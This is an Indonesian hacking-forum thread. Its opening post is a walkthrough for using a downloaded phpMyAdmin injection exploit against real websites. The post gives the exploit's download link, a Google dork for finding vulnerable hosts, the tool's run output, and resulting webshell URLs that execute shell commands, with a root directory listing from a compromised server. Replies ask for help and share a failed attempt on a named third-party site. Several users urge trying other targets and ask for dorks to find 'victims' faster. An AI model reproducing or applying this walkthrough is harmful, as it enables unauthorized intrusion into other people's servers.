phpMyAdmin injection code

[wishnusakti]

jumpa lagi nih... jangan bosen ya... disini aku mau kasih PoC phpMyAdmin injection code, dan udah berhasil sih hehehe . ok deh langsung aja :

1. Download exploit nya di milw0rm

Code: Select all

http://milw0rm.com/exploits/download/8921

2. setelah di download ubah permission file yang dengan cara :

Code: Select all

chmod 755 nama_file.sh

3. kalo kamu pake linux kamu harus install curl caranya :

Code: Select all

sudo apt-get install curl

4. googling :

Code: Select all

inurl:phpmyadmin

5. contoh nya :

Code: Select all

wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://*********.*****.**//config/config.inc.php?c=ls+-l+/
    http://***************//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com

dan hasilnya :

Code: Select all

total 112
drwxr-xr-x   2 root root  4096 Mar 11 06:47 bin
drwxr-xr-x   3 root root  4096 Apr 16 07:24 boot
lrwxrwxrwx   1 root root    11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13840 May 31 08:21 dev
drwxr-xr-x  96 root root  4096 Jun 11 06:44 etc
drwxr-xr-x   5 root root  4096 May  4 13:49 home
lrwxrwxrwx   1 root root    32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx   1 root root    31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x  13 root root 12288 Apr 16 07:23 lib
drwx------   2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x   3 root root  4096 Feb 19 20:07 media
drwxr-xr-x  14 root root  4096 May 18 22:39 mnt
drwxr-xr-x   2 root root  4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root     0 May 31 08:21 proc
drwxr-xr-x   9 root root  4096 May 19 14:47 root
drwxr-xr-x   2 root root  4096 Apr 16 07:23 sbin
-rw-------   1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x   2 root root  4096 Feb 19 20:08 srv
drwxr-xr-x  12 root root     0 May 31 08:21 sys
drwxrwxrwt   5 root root  4096 Jun 14 05:32 tmp
drwxr-xr-x  11 root root  4096 Feb 19 20:14 usr
drwxr-xr-x  15 root root  4096 Feb 19 20:26 var
lrwxrwxrwx   1 root root    29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx   1 root root    28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server

ok dehhh sekian dulu ya

thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain
salam PsyChotr0n

[agent_of_change]

bro ...
jelasin yang tahap kelima dunk

[Agoes_doubleb]

Mantap2.. tapi namaku ga ada....

[Santet]

bro setelah saya download http://milw0rm.com/exploits/download/8921
terus saya buka dengan notepad kok hasilnya kosong
apa harus pakek software khusus kah??

[Xshadow]

untuk point nomer 5
itu dijalankan di konsole linux

@atas
isinya kosong mungkin kena antivirus kamu...
coba pakai linux aja bos

[agent_of_change]

udah ku cuba...
setelah dapat korban..
keluar tulisan

yudi@yudi-laptop:~/Desktop$ ./8921.sh http://indraoct.freevar.com/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?
terus gmana?

[Santet]

iya disini terdeksi av nya linux apa geto
tpi kompi saya buat kerja
dan ini bkn kompi sendiri
ada cara laen yang bwt windows gk??
please

[Xshadow]

udah ku cuba...
setelah dapat korban..
keluar tulisan

yudi@yudi-laptop:~/Desktop$ ./8921.sh http://indraoct.freevar.com/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?
terus gmana?

berarti tidak diperbolehkan masuk phpmyadmin secara langsung
harus lewat cpanel dulu...
try and error trus bro
cari target lain
jangan terpaku 1 target

[N4ck0]

PHPmyadmin yahh
nice share om

izin nyoba

[agent_of_change]

berarti tidak diperbolehkan masuk phpmyadmin secara langsung
harus lewat cpanel dulu...
try and error trus bro
cari target lain
jangan terpaku 1 target

ada dork nya ga?
biar cepet dapet korban